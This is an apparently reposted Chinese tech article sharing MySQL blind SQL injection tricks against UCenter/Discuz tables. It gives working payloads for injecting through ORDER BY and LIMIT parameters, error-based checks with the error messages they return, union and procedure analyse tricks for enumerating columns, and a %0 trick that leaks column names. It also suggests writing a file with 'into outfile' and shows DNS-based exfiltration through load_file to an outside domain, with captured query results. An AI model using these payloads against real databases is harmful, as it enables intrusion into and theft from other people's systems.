MySQL数据库中另类盲注的一些技巧

数据库 MySQL
我们大家主要描述的是MySQL数据库中的另类盲注中的一些实用性比较好用的技巧,下面就是文章的具体内容的描述。

以下的文章主要介绍的是MySQL数据库中的另类盲注中的一些实用性比较好用的技巧,我前几天在相关网站看见MySQL数据库中的另类盲注中的一些实用性比较好用的技巧的资料,觉得挺好,就拿出来供大家分享。

 

很多技巧从国外的paper学到的,不过国内没有多少人使用

 

一、order by 的参数注入技巧:

两种方法,思路都一样。

  1. example. “select username,password from uc_members order by”.$_GET['oderby'] 

a.常见的利用方法:

1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));

 

返回错误:[Err] 1242 – Subquery returns more than 1 row

 

2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));

 

返回正常。

 

b.国外paper看到的方法:

1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;

 

返回错误:[Err] 1242 – Subquery returns more than 1 row

 

2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;

 

返回正常。

 

二、limit 的参数注入技巧:

a.order by之后的limit参数 的注入,因为正常的sql语句order by后无法接union,所以没有好办法,就一个鸡肋思路:

  1. into outfile ‘/www/root/xxx.php’; 

b.limit前无order by时的注入,那就方便多了,后面可以直接接union select ,随便怎么注都行了:

select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7

 

这里还有个技巧,使用procedure analyse可以获取字段名称:

 

select * from cdb_members where uid=1 limit 1,1 procedure analyse()

 

不过procedure analyse同样不能使用在order by之后:

 

[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()

 

[Err] 1386 – Can’t use ORDER clause with this procedure

 

三、无法猜测字段时的技巧:

在MySQL数据库以下版本或者information_schema 无法访问的时候,无法猜到某个表的字段名,于是可以采用这个办法,在子查询中使用%0,报错获得列名。以ucenter的uc_members为例。

1.猜测列数:SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)

返回错误:#1241 – Operand should contain 12 column(s)

 

2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)

 

返回正常。

 

3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)

 

返回错误:#1048 – Column ‘uid’ cannot be null

 

4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)

 

返回错误:#1048 – Column ‘username’ cannot be null

 

5. ……

 

注:5.1以上版本不适用,字段必须为非空(not null)

四、windows下利用dns解析盲注的技巧:

如果盲注很累,或者页面无论and 1=1还是and 1=2的时候返回都一模一样,这个时候利用dns进行注入是个不错的方法,前提是win环境root权限下的MySQL数据库,利用load_file函数读取 远程文件的思路。本地搭建一个dns服务器,然后将特定域名的NS server转过来。然后进行注入,并抓包。

本地测试了下(实际注入中单引号可以编码):select load_file(concat(‘\\\\aaa1.’,(select user()),’.oldjun.com\\a.txt’)),抓包成功获得select的结果:

29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

 

 【编辑推荐】

  1. MySQL 4.1 数据转换的指导
  2. 让MySQL支持中文的实际操作步骤
  3. 配置MySQL与卸载MySQL实操
  4. MySQL 修改密码的6个好用方案
  5. MySQL数据库访问妙招在Linux之下
责任编辑:佚名 来源: 博客园
相关推荐

2020-08-07 08:04:03

数据库MySQL技术

2021-09-15 09:51:36

数据库架构技术

2014-04-04 13:48:04

2011-07-29 15:58:53

SGAOracle

2011-03-21 13:41:20

数据库开发规范

2018-06-21 14:50:00

2011-03-10 13:19:47

Oracle数据库

2010-08-27 14:48:22

DB2like

2010-05-12 15:41:21

MySQL数据库

2011-06-01 16:50:21

JAVA

2012-05-21 10:13:05

XCode调试技巧

2013-03-29 13:17:53

XCode调试技巧iOS开发

2011-08-03 17:43:53

MySQL数据库外键约束

2011-07-22 09:09:52

Oracle数据库SQL效率

2016-09-12 17:19:51

JavaScriptArray操作技巧

2018-07-27 18:20:31

数据库MySQL 数据库建表

2011-08-01 13:59:22

Oracle数据库命名空间

2011-10-26 20:55:43

ssh 安全

2011-07-12 09:47:53

WebService

2011-07-27 15:01:48

MySQL数据库内存表
点赞
收藏

51CTO技术栈公众号